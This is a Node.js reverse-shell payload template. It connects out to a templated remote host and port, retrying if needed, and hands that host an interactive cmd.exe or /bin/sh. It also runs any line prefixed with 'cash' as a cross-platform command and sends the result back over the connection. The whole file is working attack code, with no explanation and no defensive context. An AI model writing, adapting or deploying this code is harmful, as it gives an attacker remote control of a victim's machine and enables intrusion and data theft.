var NetcatClient = require('netcat').client
const $ = require('cash')

var nc = new NetcatClient()
var cmd = process.platform === 'win32' ? 'cmd.exe' : '/bin/sh'

// Marker replaced at runtime.
var RHOST = '{{rhost}}'
var RPORT = {{rport}}
var RETRY = {{retry}}

nc.addr(RHOST).port(RPORT).retry(RETRY).connect().exec(cmd)

nc.filter(function (chunk, enc, next) {
  if (chunk.toString().indexOf('cash') === 0){
    // filter it on pipe
    next(null)
  } else {
    next(null, chunk)
  }
}).on('data', function(data){
  // the filter doesn't apply on 'data' events, just on the pipe stream.
  if (data.toString().indexOf('cash') === 0){
    console.log('Cross-platform command!')
    var argv = data.toString().replace('cash ', '')
    this.send($(argv)) // execute Cross-platform cmd and send result
  }
})
